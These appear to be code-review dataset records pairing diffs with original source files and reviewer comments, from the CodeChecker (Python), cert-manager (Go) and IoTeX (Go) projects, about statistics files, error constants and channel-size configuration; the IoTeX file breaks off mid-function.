@@ -336,6 +336,7 @@ def get_analysis_statistics(inputs, limits): statistics_files.append(compilation_db) elif inp_f in ['compiler_includes.json', 'compiler_target.json', + 'compiler_info.json', 'metadata.json']: analyzer_file = os.path.join(input_path, inp_f) statistics_files.append(analyzer_file)
1
# ------------------------------------------------------------------------- # The CodeChecker Infrastructure # This file is distributed under the University of Illinois Open Source # License. See LICENSE.TXT for details. # ------------------------------------------------------------------------- """ 'CodeChecker store' parses a list of analysis results and stores them in the database. """ from __future__ import print_function from __future__ import division from __future__ import absolute_import import argparse import base64 import errno import json import os import sys import tempfile import zipfile import zlib from codeCheckerDBAccess_v6.ttypes import StoreLimitKind from shared.ttypes import Permission, RequestFailed, ErrorCode from libcodechecker import logger from libcodechecker import package_context from libcodechecker import host_check from libcodechecker import util from libcodechecker.analyze import plist_parser from libcodechecker.libclient import client as libclient from libcodechecker.output_formatters import twodim_to_str from libcodechecker.util import sizeof_fmt from libcodechecker.util import split_product_url LOG = logger.get_logger('system') MAX_UPLOAD_SIZE = 1 * 1024 * 1024 * 1024 # 1GiB def get_argparser_ctor_args(): """ This method returns a dict containing the kwargs for constructing an argparse.ArgumentParser (either directly or as a subparser). """ return { 'prog': 'CodeChecker store', 'formatter_class': argparse.ArgumentDefaultsHelpFormatter, # Description is shown when the command's help is queried directly 'description': "Store the results from one or more 'codechecker-" "analyze' result files in a database.", # Epilogue is shown after the arguments when the help is queried # directly. 'epilog': "The results can be viewed by connecting to such a server " "in a Web browser or via 'CodeChecker cmd'.", # Help is shown when the "parent" CodeChecker command lists the # individual subcommands. 'help': "Save analysis results to a database." } def add_arguments_to_parser(parser): """ Add the subcommand's arguments to the given argparse.ArgumentParser. """ parser.add_argument('input', type=str, nargs='*', metavar='file/folder', default=os.path.join(util.get_default_workspace(), 'reports'), help="The analysis result files and/or folders " "containing analysis results which should be " "parsed and printed.") parser.add_argument('-t', '--type', '--input-format', dest="input_format", required=False, choices=['plist'], default='plist', help="Specify the format the analysis results were " "created as.") parser.add_argument('-n', '--name', type=str, dest="name", required=False, default=argparse.SUPPRESS, help="The name of the analysis run to use in storing " "the reports to the database. If not specified, " "the '--name' parameter given to 'codechecker-" "analyze' will be used, if exists.") parser.add_argument('--tag', type=str, dest="tag", required=False, default=argparse.SUPPRESS, help="A uniques identifier for this individual store " "of results in the run's history.") parser.add_argument('--trim-path-prefix', type=str, nargs='*', dest="trim_path_prefix", required=False, default=argparse.SUPPRESS, help="Removes leading path from files which will be " "stored. So if you have /a/b/c/x.cpp and " "/a/b/c/y.cpp then by removing \"/a/b/\" prefix " "will store files like c/x.cpp and c/y.cpp. " "If multiple prefix is given, the longest match " "will be removed.") parser.add_argument('-f', '--force', dest="force", default=argparse.SUPPRESS, action='store_true', required=False, help="Delete analysis results stored in the database " "for the current analysis run's name and store " "only the results reported in the 'input' files. " "(By default, CodeChecker would keep reports " "that were coming from files not affected by the " "analysis, and only incrementally update defect " "reports for source files that were analysed.)") server_args = parser.add_argument_group( "server arguments", "Specifies a 'CodeChecker server' instance which will be used to " "store the results. This server must be running and listening, and " "the given product must exist prior to the 'store' command being ran.") server_args.add_argument('--url', type=str, metavar='PRODUCT_URL', dest="product_url", default="localhost:8001/Default", required=False, help="The URL of the product to store the " "results for, in the format of " "'[http[s]://]host:port/Endpoint'.") logger.add_verbose_arguments(parser) parser.set_defaults(func=main) def __get_run_name(input_list): """Create a runname for the stored analysis from the input list.""" # Try to create a name from the metada JSON(s). names = [] for input_path in input_list: metafile = os.path.join(input_path, "metadata.json") if os.path.isdir(input_path) and os.path.exists(metafile): metajson = util.load_json_or_empty(metafile) if 'name' in metajson: names.append(metajson['name']) else: names.append("unnamed result folder") if len(names) == 1 and names[0] != "unnamed result folder": return names[0] elif len(names) > 1: return "multiple projects: " + ', '.join(names) else: return False def res_handler(results): """ Summary about the parsing and storage results. """ LOG.info("Finished processing and storing reports.") LOG.info("Failed: " + str(results.count(1)) + "/" + str(len(results))) LOG.info("Successful " + str(results.count(0)) + "/" + str(len(results))) def assemble_zip(inputs, zip_file, client): hash_to_file = {} # There can be files with same hash, # but different path. file_to_hash = {} file_to_mtime = {} missing_source_files = set() def collect_file_hashes_from_plist(plist_file): """ Collects file content hashes and last modification times of files which can be found in the given plist file. :returns List of file paths which are in the processed plist file but missing from the user's disk. """ missing_files = [] try: files, _ = plist_parser.parse_plist(plist_file) for f in files: if not os.path.isfile(f): missing_files.append(f) missing_source_files.add(f) continue content_hash = util.get_file_content_hash(f) hash_to_file[content_hash] = f file_to_hash[f] = content_hash file_to_mtime[f] = util.get_last_mod_time(f) return missing_files except Exception as ex: LOG.error('Parsing the plist failed: ' + str(ex)) plist_report_files = [] changed_files = set() for input_path in inputs: input_path = os.path.abspath(input_path) if not os.path.exists(input_path): raise OSError(errno.ENOENT, "Input path does not exist", input_path) if os.path.isfile(input_path): files = [input_path] else: _, _, files = next(os.walk(input_path), ([], [], [])) for f in files: plist_file = os.path.join(input_path, f) if f.endswith(".plist"): missing_files = collect_file_hashes_from_plist(plist_file) if not missing_files: LOG.debug( "Copying file '{0}' to ZIP assembly dir..." .format(plist_file)) plist_report_files.append(os.path.join(input_path, f)) else: LOG.warning("Skipping '%s' because it refers " "the following missing source files: %s", plist_file, missing_files) elif f == 'metadata.json': plist_report_files.append(os.path.join(input_path, f)) elif f == 'skip_file': plist_report_files.append(os.path.join(input_path, f)) plist_mtime = util.get_last_mod_time(plist_file) for k, v in file_to_mtime.items(): if v > plist_mtime: changed_files.add(k) if changed_files: changed_files = '\n'.join([' - ' + f for f in changed_files]) LOG.warning("The following source file contents changed since the " "latest analysis:\n{0}\nPlease analyze your project " "again to update the reports!".format(changed_files)) sys.exit(1) with zipfile.ZipFile(zip_file, 'a', allowZip64=True) as zipf: for pl in plist_report_files: _, plist_filename = os.path.split(pl) zip_target = os.path.join('reports', plist_filename) zipf.write(pl, zip_target) if len(hash_to_file) == 0: LOG.warning("There is no report to store. After uploading these " "results the previous reports become resolved.") file_hashes = hash_to_file.keys() necessary_hashes = client.getMissingContentHashes(file_hashes) \ if file_hashes else [] for f, h in file_to_hash.items(): if h in necessary_hashes: LOG.debug("File contents for '{0}' needed by the server" .format(f)) zipf.write(f, os.path.join('root', f.lstrip('/'))) zipf.writestr('content_hashes.json', json.dumps(file_to_hash)) # Compressing .zip file with open(zip_file, 'rb') as source: compressed = zlib.compress(source.read(), zlib.Z_BEST_COMPRESSION) with open(zip_file, 'wb') as target: target.write(compressed) LOG.debug("[ZIP] Mass store zip written at '{0}'".format(zip_file)) if missing_source_files: LOG.warning("Missing source files: \n%s", '\n'.join( map(lambda f_: " - " + f_, missing_source_files))) def get_analysis_statistics(inputs, limits): """ Collects analysis statistics information and returns them. """ statistics_files = [] for input_path in inputs: input_path = os.path.abspath(input_path) if not os.path.exists(input_path): raise OSError(errno.ENOENT, "Input path does not exist", input_path) dirs = [] if os.path.isfile(input_path): files = [input_path] else: _, dirs, files = next(os.walk(input_path), ([], [], [])) for inp_f in files: if inp_f == 'compile_cmd.json': compilation_db = os.path.join(input_path, inp_f) compilation_db_size = \ limits.get(StoreLimitKind.COMPILATION_DATABASE_SIZE) if os.stat(compilation_db).st_size > compilation_db_size: LOG.debug("Compilation database is too big (max: %s).", sizeof_fmt(compilation_db_size)) else: LOG.debug("Copying file '%s' to analyzer statistics " "ZIP...", compilation_db) statistics_files.append(compilation_db) elif inp_f in ['compiler_includes.json', 'compiler_target.json', 'metadata.json']: analyzer_file = os.path.join(input_path, inp_f) statistics_files.append(analyzer_file) for inp_dir in dirs: if inp_dir == 'failed': failure_zip_limit = limits.get(StoreLimitKind.FAILURE_ZIP_SIZE) failed_dir = os.path.join(input_path, inp_dir) _, _, files = next(os.walk(failed_dir), ([], [], [])) failed_files_size = 0 for f in files: failure_zip = os.path.join(failed_dir, f) failure_zip_size = os.stat(failure_zip).st_size failed_files_size += failure_zip_size if failed_files_size > failure_zip_limit: LOG.debug("We reached the limit of maximum uploadable " "failure zip size (max: %s).", sizeof_fmt(failure_zip_limit)) break else: LOG.debug("Copying failure zip file '%s' to analyzer " "statistics ZIP...", failure_zip) statistics_files.append(failure_zip) return statistics_files def storing_analysis_statistics(client, inputs, run_name): """ Collects and stores analysis statistics information on the server. """ _, zip_file = tempfile.mkstemp('.zip') LOG.debug("Will write failed store ZIP to '%s'...", zip_file) try: limits = client.getAnalysisStatisticsLimits() statistics_files = get_analysis_statistics(inputs, limits) if not statistics_files: LOG.debug("No analyzer statistics information can be found in the " "report directory.") return False # Write statistics files to the ZIP file. with zipfile.ZipFile(zip_file, 'a', allowZip64=True) as zipf: for stat_file in statistics_files: zipf.write(stat_file) # Compressing .zip file with open(zip_file, 'rb') as source: compressed = zlib.compress(source.read(), zlib.Z_BEST_COMPRESSION) with open(zip_file, 'wb') as target: target.write(compressed) LOG.debug("[ZIP] Analysis statistics zip written at '%s'", zip_file) with open(zip_file, 'rb') as zf: b64zip = base64.b64encode(zf.read()) # Store analysis statistics on the server return client.storeAnalysisStatistics(run_name, b64zip) except Exception as ex: LOG.debug("Storage of analysis statistics zip has been failed: %s", ex) finally: os.remove(zip_file) def main(args): """ Store the defect results in the specified input list as bug reports in the database. """ logger.setup_logger(args.verbose if 'verbose' in args else None) if not host_check.check_zlib(): raise Exception("zlib is not available on the system!") # To ensure the help message prints the default folder properly, # the 'default' for 'args.input' is a string, not a list. # But we need lists for the foreach here to work. if isinstance(args.input, str): args.input = [args.input] if 'name' not in args: LOG.debug("Generating name for analysis...") generated = __get_run_name(args.input) if generated: setattr(args, 'name', generated) else: LOG.error("No suitable name was found in the inputs for the " "analysis run. Please specify one by passing argument " "--name run_name in the invocation.") sys.exit(2) # argparse returns error code 2 for bad invocations. LOG.info("Storing analysis results for run '" + args.name + "'") if 'force' in args: LOG.info("argument --force was specified: the run with name '" + args.name + "' will be deleted.") protocol, host, port, product_name = split_product_url(args.product_url) # Before any transmission happens, check if we have the PRODUCT_STORE # permission to prevent a possibly long ZIP operation only to get an # error later on. product_client = libclient.setup_product_client(protocol, host, port, product_name) product_id = product_client.getCurrentProduct().id auth_client, _ = libclient.setup_auth_client(protocol, host, port) has_perm = libclient.check_permission( auth_client, Permission.PRODUCT_STORE, {'productID': product_id}) if not has_perm: LOG.error("You are not authorised to store analysis results in " "product '{0}'".format(product_name)) sys.exit(1) # Setup connection to the remote server. client = libclient.setup_client(args.product_url, product_client=False) LOG.debug("Initializing client connecting to {0}:{1}/{2} done." .format(host, port, product_name)) _, zip_file = tempfile.mkstemp('.zip') LOG.debug("Will write mass store ZIP to '{0}'...".format(zip_file)) try: assemble_zip(args.input, zip_file, client) if os.stat(zip_file).st_size > MAX_UPLOAD_SIZE: LOG.error("The result list to upload is too big (max: {})." .format(sizeof_fmt(MAX_UPLOAD_SIZE))) sys.exit(1) with open(zip_file, 'rb') as zf: b64zip = base64.b64encode(zf.read()) context = package_context.get_context() trim_path_prefixes = args.trim_path_prefix if \ 'trim_path_prefix' in args else None client.massStoreRun(args.name, args.tag if 'tag' in args else None, str(context.version), b64zip, 'force' in args, trim_path_prefixes) # Storing analysis statistics if the server allows them. if client.allowsStoringAnalysisStatistics(): storing_analysis_statistics(client, args.input, args.name) LOG.info("Storage finished successfully.") except RequestFailed as reqfail: if reqfail.errorCode == ErrorCode.SOURCE_FILE: header = ['File', 'Line', 'Checker name'] table = twodim_to_str('table', header, [c.split('|') for c in reqfail.extraInfo]) LOG.warning("Setting the review statuses for some reports failed " "because of non valid source code comments: " "{0}\n {1}".format(reqfail.message, table)) sys.exit(1) except Exception as ex: LOG.info("Storage failed: " + str(ex)) sys.exit(1) finally: os.remove(zip_file)
1
10,108
Do we still have these files? Shouldn't we remove these?
Ericsson-codechecker
c
@@ -22,6 +22,11 @@ import ( "github.com/jetstack/cert-manager/pkg/apis/certmanager/v1alpha1" ) + const ( + // Error reason generated when duration or renewBefore is invalid + ErrorDurationInvalid = "ErrDurationInvalid" +) + type Interface interface { // Setup initialises the issuer. This may include registering accounts with // a service, creating a CA and storing it somewhere, or verifying
1
/* Copyright 2018 The Jetstack cert-manager contributors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package issuer import ( "context" "github.com/jetstack/cert-manager/pkg/apis/certmanager/v1alpha1" ) type Interface interface { // Setup initialises the issuer. This may include registering accounts with // a service, creating a CA and storing it somewhere, or verifying // credentials and authorization with a remote server. Setup(ctx context.Context) (SetupResponse, error) // Issue attempts to issue a certificate as described by the certificate // resource given Issue(context.Context, *v1alpha1.Certificate) (IssueResponse, error) } type IssueResponse struct { // If Requeue is true, the Certificate will be requeued for processing // after applying the controllers rate limit. Requeue bool // Certificate is the certificate resource that should be stored in the // target secret. // It will only be set if the corresponding private key is also set on the // IssuerResponse structure. Certificate []byte // PrivateKey is the private key that should be stored in the target secret. // If set, the certificate and CA field will also be overwritten with the // contents of the field. // If Certificate is not set, the existing Certificate will be overwritten. PrivateKey []byte // CA is the CA certificate that should be stored in the target secret. // This field should only be set if the private key field is set, similar // to the Certificate field. CA []byte } type SetupResponse struct { // If Requeue is true, the Certificate will be requeued for processing // after applying the controllers rate limit. Requeue bool }
1
13,784
A lot of things to do with constants seemed to move since the original commit, so I stuck this here, Is there a better place for it?
jetstack-cert-manager
go
@@ -171,7 +171,9 @@ var ( RepeatDecayStep: 1, }, Dispatcher: Dispatcher{ - EventChanSize: 10000, + ActionChanSize: 1000, + BlockChanSize: 1000, + BlockSyncChanSize: 10, }, API: API{ UseRDS: false,
1
// Copyright (c) 2019 IoTeX Foundation // This is an alpha (internal) release and is not suitable for production. This source code is provided 'as is' and no // warranties are given as to title or non-infringement, merchantability or fitness for purpose and, to the extent // permitted by law, all liability for your use of the code is disclaimed. This source code is governed by Apache // License 2.0 that can be found in the LICENSE file. package config import ( "crypto/ecdsa" "flag" "math/big" "os" "strings" "sync" "sync/atomic" "time" "github.com/iotexproject/go-p2p" "github.com/iotexproject/go-pkgs/crypto" "github.com/iotexproject/iotex-election/committee" "github.com/pkg/errors" uconfig "go.uber.org/config" "go.uber.org/zap" "github.com/iotexproject/iotex-address/address" "github.com/iotexproject/iotex-core/blockchain/genesis" "github.com/iotexproject/iotex-core/pkg/log" "github.com/iotexproject/iotex-core/pkg/unit" ) // IMPORTANT: to define a config, add a field or a new config type to the existing config types. In addition, provide // the default value in Default var. func init() { flag.StringVar(&_overwritePath, "config-path", "", "Config path") flag.StringVar(&_secretPath, "secret-path", "", "Secret path") flag.StringVar(&_subChainPath, "sub-config-path", "", "Sub chain Config path") flag.Var(&_plugins, "plugin", "Plugin of the node") } var ( // overwritePath is the path to the config file which overwrite default values _overwritePath string // secretPath is the path to the config file store secret values _secretPath string _subChainPath string _plugins strs _evmNetworkID uint32 loadChainID sync.Once ) const ( // RollDPoSScheme means randomized delegated proof of stake RollDPoSScheme = "ROLLDPOS" // StandaloneScheme means that the node creates a block periodically regardless of others (if there is any) StandaloneScheme = "STANDALONE" // NOOPScheme means that the node does not create only block NOOPScheme = "NOOP" ) const ( // GatewayPlugin is the plugin of accepting user API requests and serving blockchain data to users GatewayPlugin = iota ) type strs []string func (ss *strs) String() string { return strings.Join(*ss, ",") } func (ss *strs) Set(str string) error { *ss = append(*ss, str) return nil } // Dardanelles consensus config const ( DardanellesUnmatchedEventTTL = 2 * time.Second DardanellesUnmatchedEventInterval = 100 * time.Millisecond DardanellesAcceptBlockTTL = 2 * time.Second DardanellesAcceptProposalEndorsementTTL = time.Second DardanellesAcceptLockEndorsementTTL = time.Second DardanellesCommitTTL = time.Second DardanellesBlockInterval = 5 * time.Second DardanellesDelay = 2 * time.Second SigP256k1 = "secp256k1" SigP256sm2 = "p256sm2" ) var ( // Default is the default config Default = Config{ Plugins: make(map[int]interface{}), SubLogs: make(map[string]log.GlobalConfig), Network: Network{ Host: "0.0.0.0", Port: 4689, ExternalHost: "", ExternalPort: 4689, BootstrapNodes: []string{}, MasterKey: "", RateLimit: p2p.DefaultRatelimitConfig, EnableRateLimit: true, PrivateNetworkPSK: "", }, Chain: Chain{ ChainDBPath: "/var/data/chain.db", TrieDBPath: "/var/data/trie.db", IndexDBPath: "/var/data/index.db", BloomfilterIndexDBPath: "/var/data/bloomfilter.index.db", CandidateIndexDBPath: "/var/data/candidate.index.db", StakingIndexDBPath: "/var/data/staking.index.db", ID: 1, EVMNetworkID: 4689, Address: "", ProducerPrivKey: generateRandomKey(SigP256k1), SignatureScheme: []string{SigP256k1}, EmptyGenesis: false, GravityChainDB: DB{DbPath: "/var/data/poll.db", NumRetries: 10}, Committee: committee.Config{ GravityChainAPIs: []string{}, }, EnableTrielessStateDB: true, EnableStateDBCaching: false, EnableArchiveMode: false, EnableAsyncIndexWrite: true, EnableSystemLogIndexer: false, EnableStakingProtocol: true, EnableStakingIndexer: false, CompressBlock: false, AllowedBlockGasResidue: 10000, MaxCacheSize: 0, PollInitialCandidatesInterval: 10 * time.Second, StateDBCacheSize: 1000, WorkingSetCacheSize: 20, }, ActPool: ActPool{ MaxNumActsPerPool: 32000, MaxGasLimitPerPool: 320000000, MaxNumActsPerAcct: 2000, ActionExpiry: 10 * time.Minute, MinGasPriceStr: big.NewInt(unit.Qev).String(), BlackList: []string{}, }, Consensus: Consensus{ Scheme: StandaloneScheme, RollDPoS: RollDPoS{ FSM: ConsensusTiming{ UnmatchedEventTTL: 3 * time.Second, UnmatchedEventInterval: 100 * time.Millisecond, AcceptBlockTTL: 4 * time.Second, AcceptProposalEndorsementTTL: 2 * time.Second, AcceptLockEndorsementTTL: 2 * time.Second, CommitTTL: 2 * time.Second, EventChanSize: 10000, }, ToleratedOvertime: 2 * time.Second, Delay: 5 * time.Second, ConsensusDBPath: "/var/data/consensus.db", }, }, BlockSync: BlockSync{ Interval: 30 * time.Second, ProcessSyncRequestTTL: 10 * time.Second, BufferSize: 200, IntervalSize: 20, MaxRepeat: 3, RepeatDecayStep: 1, }, Dispatcher: Dispatcher{ EventChanSize: 10000, }, API: API{ UseRDS: false, Port: 14014, TpsWindow: 10, GasStation: GasStation{ SuggestBlockWindow: 20, DefaultGas: uint64(unit.Qev), Percentile: 60, }, RangeQueryLimit: 1000, }, System: System{ Active: true, HeartbeatInterval: 10 * time.Second, HTTPStatsPort: 8080, HTTPAdminPort: 9009, StartSubChainInterval: 10 * time.Second, SystemLogDBPath: "/var/data/systemlog.db", }, DB: DB{ NumRetries: 3, MaxCacheSize: 64, BlockStoreBatchSize: 16, V2BlocksToSplitDB: 1000000, Compressor: "Snappy", CompressLegacy: false, SplitDBSizeMB: 0, SplitDBHeight: 900000, HistoryStateRetention: 2000, }, Indexer: Indexer{ RangeBloomFilterNumElements: 100000, RangeBloomFilterSize: 1200000, RangeBloomFilterNumHash: 8, }, Genesis: genesis.Default, } // ErrInvalidCfg indicates the invalid config value ErrInvalidCfg = errors.New("invalid config value") // Validates is the collection config validation functions Validates = []Validate{ ValidateRollDPoS, ValidateArchiveMode, ValidateDispatcher, ValidateAPI, ValidateActPool, ValidateForkHeights, } ) // Network is the config struct for network package type ( Network struct { Host string `yaml:"host"` Port int `yaml:"port"` ExternalHost string `yaml:"externalHost"` ExternalPort int `yaml:"externalPort"` BootstrapNodes []string `yaml:"bootstrapNodes"` MasterKey string `yaml:"masterKey"` // master key will be PrivateKey if not set. // RelayType is the type of P2P network relay. By default, the value is empty, meaning disabled. Two relay types // are supported: active, nat. RelayType string `yaml:"relayType"` RateLimit p2p.RateLimitConfig `yaml:"rateLimit"` EnableRateLimit bool `yaml:"enableRateLimit"` PrivateNetworkPSK string `yaml:"privateNetworkPSK"` } // Chain is the config struct for blockchain package Chain struct { ChainDBPath string `yaml:"chainDBPath"` TrieDBPath string `yaml:"trieDBPath"` IndexDBPath string `yaml:"indexDBPath"` BloomfilterIndexDBPath string `yaml:"bloomfilterIndexDBPath"` CandidateIndexDBPath string `yaml:"candidateIndexDBPath"` StakingIndexDBPath string `yaml:"stakingIndexDBPath"` ID uint32 `yaml:"id"` EVMNetworkID uint32 `yaml:"evmNetworkID"` Address string `yaml:"address"` ProducerPrivKey string `yaml:"producerPrivKey"` SignatureScheme []string `yaml:"signatureScheme"` EmptyGenesis bool `yaml:"emptyGenesis"` GravityChainDB DB `yaml:"gravityChainDB"` Committee committee.Config `yaml:"committee"` EnableTrielessStateDB bool `yaml:"enableTrielessStateDB"` // EnableStateDBCaching enables cachedStateDBOption EnableStateDBCaching bool `yaml:"enableStateDBCaching"` // EnableArchiveMode is only meaningful when EnableTrielessStateDB is false EnableArchiveMode bool `yaml:"enableArchiveMode"` // EnableAsyncIndexWrite enables writing the block actions' and receipts' index asynchronously EnableAsyncIndexWrite bool `yaml:"enableAsyncIndexWrite"` // deprecated EnableSystemLogIndexer bool `yaml:"enableSystemLog"` // EnableStakingProtocol enables staking protocol EnableStakingProtocol bool `yaml:"enableStakingProtocol"` // EnableStakingIndexer enables staking indexer EnableStakingIndexer bool `yaml:"enableStakingIndexer"` // deprecated by DB.CompressBlock CompressBlock bool `yaml:"compressBlock"` // AllowedBlockGasResidue is the amount of gas remained when block producer could stop processing more actions AllowedBlockGasResidue uint64 `yaml:"allowedBlockGasResidue"` // MaxCacheSize is the max number of blocks that will be put into an LRU cache. 0 means disabled MaxCacheSize int `yaml:"maxCacheSize"` // PollInitialCandidatesInterval is the config for committee init db PollInitialCandidatesInterval time.Duration `yaml:"pollInitialCandidatesInterval"` // StateDBCacheSize is the max size of statedb LRU cache StateDBCacheSize int `yaml:"stateDBCacheSize"` // WorkingSetCacheSize is the max size of workingset cache in state factory WorkingSetCacheSize uint64 `yaml:"workingSetCacheSize"` } // Consensus is the config struct for consensus package Consensus struct { // There are three schemes that are supported Scheme string `yaml:"scheme"` RollDPoS RollDPoS `yaml:"rollDPoS"` } // BlockSync is the config struct for the BlockSync BlockSync struct { Interval time.Duration `yaml:"interval"` // update duration ProcessSyncRequestTTL time.Duration `yaml:"processSyncRequestTTL"` BufferSize uint64 `yaml:"bufferSize"` IntervalSize uint64 `yaml:"intervalSize"` // MaxRepeat is the maximal number of repeat of a block sync request MaxRepeat int `yaml:"maxRepeat"` // RepeatDecayStep is the step for repeat number decreasing by 1 RepeatDecayStep int `yaml:"repeatDecayStep"` } // RollDPoS is the config struct for RollDPoS consensus package RollDPoS struct { FSM ConsensusTiming `yaml:"fsm"` ToleratedOvertime time.Duration `yaml:"toleratedOvertime"` Delay time.Duration `yaml:"delay"` ConsensusDBPath string `yaml:"consensusDBPath"` } // ConsensusTiming defines a set of time durations used in fsm and event queue size ConsensusTiming struct { EventChanSize uint `yaml:"eventChanSize"` UnmatchedEventTTL time.Duration `yaml:"unmatchedEventTTL"` UnmatchedEventInterval time.Duration `yaml:"unmatchedEventInterval"` AcceptBlockTTL time.Duration `yaml:"acceptBlockTTL"` AcceptProposalEndorsementTTL time.Duration `yaml:"acceptProposalEndorsementTTL"` AcceptLockEndorsementTTL time.Duration `yaml:"acceptLockEndorsementTTL"` CommitTTL time.Duration `yaml:"commitTTL"` } // Dispatcher is the dispatcher config Dispatcher struct { EventChanSize uint `yaml:"eventChanSize"` // TODO: explorer dependency deleted at #1085, need to revive by migrating to api } // API is the api service config API struct { UseRDS bool `yaml:"useRDS"` Port int `yaml:"port"` TpsWindow int `yaml:"tpsWindow"` GasStation GasStation `yaml:"gasStation"` RangeQueryLimit uint64 `yaml:"rangeQueryLimit"` } // GasStation is the gas station config GasStation struct { SuggestBlockWindow int `yaml:"suggestBlockWindow"` DefaultGas uint64 `yaml:"defaultGas"` Percentile int `yaml:"Percentile"` } // System is the system config System struct { // Active is the status of the node. True means active and false means stand-by Active bool `yaml:"active"` HeartbeatInterval time.Duration `yaml:"heartbeatInterval"` // HTTPProfilingPort is the port number to access golang performance profiling data of a blockchain node. It is // 0 by default, meaning performance profiling has been disabled HTTPAdminPort int `yaml:"httpAdminPort"` HTTPStatsPort int `yaml:"httpStatsPort"` StartSubChainInterval time.Duration `yaml:"startSubChainInterval"` SystemLogDBPath string `yaml:"systemLogDBPath"` } // ActPool is the actpool config ActPool struct { // MaxNumActsPerPool indicates maximum number of actions the whole actpool can hold MaxNumActsPerPool uint64 `yaml:"maxNumActsPerPool"` // MaxGasLimitPerPool indicates maximum gas limit the whole actpool can hold MaxGasLimitPerPool uint64 `yaml:"maxGasLimitPerPool"` // MaxNumActsPerAcct indicates maximum number of actions an account queue can hold MaxNumActsPerAcct uint64 `yaml:"maxNumActsPerAcct"` // ActionExpiry defines how long an action will be kept in action pool. ActionExpiry time.Duration `yaml:"actionExpiry"` // MinGasPriceStr defines the minimal gas price the delegate will accept for an action MinGasPriceStr string `yaml:"minGasPrice"` // BlackList lists the account address that are banned from initiating actions BlackList []string `yaml:"blackList"` } // DB is the config for database DB struct { DbPath string `yaml:"dbPath"` // NumRetries is the number of retries NumRetries uint8 `yaml:"numRetries"` // MaxCacheSize is the max number of blocks that will be put into an LRU cache. 0 means disabled MaxCacheSize int `yaml:"maxCacheSize"` // BlockStoreBatchSize is the number of blocks to be stored together as a unit (to get better compression) BlockStoreBatchSize int `yaml:"blockStoreBatchSize"` // V2BlocksToSplitDB is the accumulated number of blocks to split a new file after v1.1.2 V2BlocksToSplitDB uint64 `yaml:"v2BlocksToSplitDB"` // Compressor is the compression used on block data, used by new DB file after v1.1.2 Compressor string `yaml:"compressor"` // CompressLegacy enables gzip compression on block data, used by legacy DB file before v1.1.2 CompressLegacy bool `yaml:"compressLegacy"` // SplitDBSize is the config for DB's split file size SplitDBSizeMB uint64 `yaml:"splitDBSizeMB"` // SplitDBHeight is the config for DB's split start height SplitDBHeight uint64 `yaml:"splitDBHeight"` // HistoryStateRetention is the number of blocks account/contract state will be retained HistoryStateRetention uint64 `yaml:"historyStateRetention"` } // Indexer is the config for indexer Indexer struct { // RangeBloomFilterNumElements is the number of elements each rangeBloomfilter will store in bloomfilterIndexer RangeBloomFilterNumElements uint64 `yaml:"rangeBloomFilterNumElements"` // RangeBloomFilterSize is the size (in bits) of rangeBloomfilter RangeBloomFilterSize uint64 `yaml:"rangeBloomFilterSize"` // RangeBloomFilterNumHash is the number of hash functions of rangeBloomfilter RangeBloomFilterNumHash uint64 `yaml:"rangeBloomFilterNumHash"` } // Config is the root config struct, each package's config should be put as its sub struct Config struct { Plugins map[int]interface{} `ymal:"plugins"` Network Network `yaml:"network"` Chain Chain `yaml:"chain"` ActPool ActPool `yaml:"actPool"` Consensus Consensus `yaml:"consensus"` BlockSync BlockSync `yaml:"blockSync"` Dispatcher Dispatcher `yaml:"dispatcher"` API API `yaml:"api"` System System `yaml:"system"` DB DB `yaml:"db"` Indexer Indexer `yaml:"indexer"` Log log.GlobalConfig `yaml:"log"` SubLogs map[string]log.GlobalConfig `yaml:"subLogs"` Genesis genesis.Genesis `yaml:"genesis"` } // Validate is the interface of validating the config Validate func(Config) error ) // SplitDBSize returns the configured SplitDBSizeMB func (db DB) SplitDBSize() uint64 { return db.SplitDBSizeMB * 1024 * 1024 } // New creates a config instance. It first loads the default configs. If the config path is not empty, it will read from // the file and override the default configs. By default, it will apply all validation functions. To bypass validation, // use DoNotValidate instead. func New(validates ...Validate) (Config, error) { opts := make([]uconfig.YAMLOption, 0) opts = append(opts, uconfig.Static(Default)) opts = append(opts, uconfig.Expand(os.LookupEnv)) if _overwritePath != "" { opts = append(opts, uconfig.File(_overwritePath)) } if _secretPath != "" { opts = append(opts, uconfig.File(_secretPath)) } yaml, err := uconfig.NewYAML(opts...) if err != nil { return Config{}, errors.Wrap(err, "failed to init config") } var cfg Config if err := yaml.Get(uconfig.Root).Populate(&cfg); err != nil { return Config{}, errors.Wrap(err, "failed to unmarshal YAML config to struct") } // set network master key to private key if cfg.Network.MasterKey == "" { cfg.Network.MasterKey = cfg.Chain.ProducerPrivKey } // set plugins for _, plugin := range _plugins { switch strings.ToLower(plugin) { case "gateway": cfg.Plugins[GatewayPlugin] = nil default: return Config{}, errors.Errorf("Plugin %s is not supported", plugin) } } // By default, the config needs to pass all the validation if len(validates) == 0 { validates = Validates } for _, validate := range validates { if err := validate(cfg); err != nil { return Config{}, errors.Wrap(err, "failed to validate config") } } return cfg, nil } // NewSub create config for sub chain. func NewSub(validates ...Validate) (Config, error) { if _subChainPath == "" { return Config{}, nil } opts := make([]uconfig.YAMLOption, 0) opts = append(opts, uconfig.Static(Default)) opts = append(opts, uconfig.Expand(os.LookupEnv)) opts = append(opts, uconfig.File(_subChainPath)) if _secretPath != "" { opts = append(opts, uconfig.File(_secretPath)) } yaml, err := uconfig.NewYAML(opts...) if err != nil { return Config{}, errors.Wrap(err, "failed to init config") } var cfg Config if err := yaml.Get(uconfig.Root).Populate(&cfg); err != nil { return Config{}, errors.Wrap(err, "failed to unmarshal YAML config to struct") } // By default, the config needs to pass all the validation if len(validates) == 0 { validates = Validates } for _, validate := range validates { if err := validate(cfg); err != nil { return Config{}, errors.Wrap(err, "failed to validate config") } } return cfg, nil } // SetEVMNetworkID sets the extern chain ID func SetEVMNetworkID(id uint32) { loadChainID.Do(func() { _evmNetworkID = id }) } // EVMNetworkID returns the extern chain ID func EVMNetworkID() uint32 { return atomic.LoadUint32(&_evmNetworkID) } // ProducerAddress returns the configured producer address derived from key func (cfg Config) ProducerAddress() address.Address { sk := cfg.ProducerPrivateKey() addr, err := address.FromBytes(sk.PublicKey().Hash()) if err != nil { log.L().Panic( "Error when constructing producer address", zap.Error(err), ) } return addr } // ProducerPrivateKey returns the configured private key func (cfg Config) 